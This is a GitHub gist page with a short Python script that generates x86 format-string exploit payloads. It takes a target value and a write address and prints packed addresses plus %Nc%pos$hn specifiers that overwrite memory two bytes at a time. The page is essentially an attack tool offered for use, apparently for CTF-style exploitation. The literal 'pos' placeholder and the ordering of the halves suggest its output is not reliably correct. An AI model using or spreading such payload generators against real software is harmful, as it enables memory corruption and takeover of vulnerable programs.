Created
June 23, 2018 10:29
-
-
Save lpraat/8c7351ea568e004af9785127437f23be to your computer and use it in GitHub Desktop.
Format Strings generator for x86
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def little_endian(hex_str): | |
| hex_str = fix_hex(hex_str) | |
| chars = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)][::-1] | |
| return bytes.fromhex("".join(chars)) | |
| def remove0x(hex_str): | |
| return hex_str[2:] | |
| def half(hex_str): | |
| hex_str = fix_hex(hex_str) | |
| return int(hex_str[:4], 16), int(hex_str[4:], 16) | |
| def fix_hex(hex_str): | |
| if len(hex_str) == 7: | |
| hex_str = '0' + hex_str | |
| return hex_str | |
| try: | |
| target = int(input("Insert target address\n"), 16) | |
| write_addr = int(input("Insert the address where you want to write\n"), 16) | |
| write_addr_p2 = write_addr + 2 | |
| h1, h2 = half(remove0x(hex(target))) | |
| first, second = (h1, h2) if h1 < h2 else (h2, h1) | |
| first_pad = first-8 | |
| second_pad = second-first | |
| print("Here's your format string") | |
| print(little_endian(remove0x(hex(write_addr)))) | |
| print(little_endian(remove0x(hex(write_addr_p2)))) | |
| print(f"%{first_pad}c%pos$hn") | |
| print(f"%{second_pad}c%pos+1$hn") | |
| except Exception as e: | |
| print("error") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment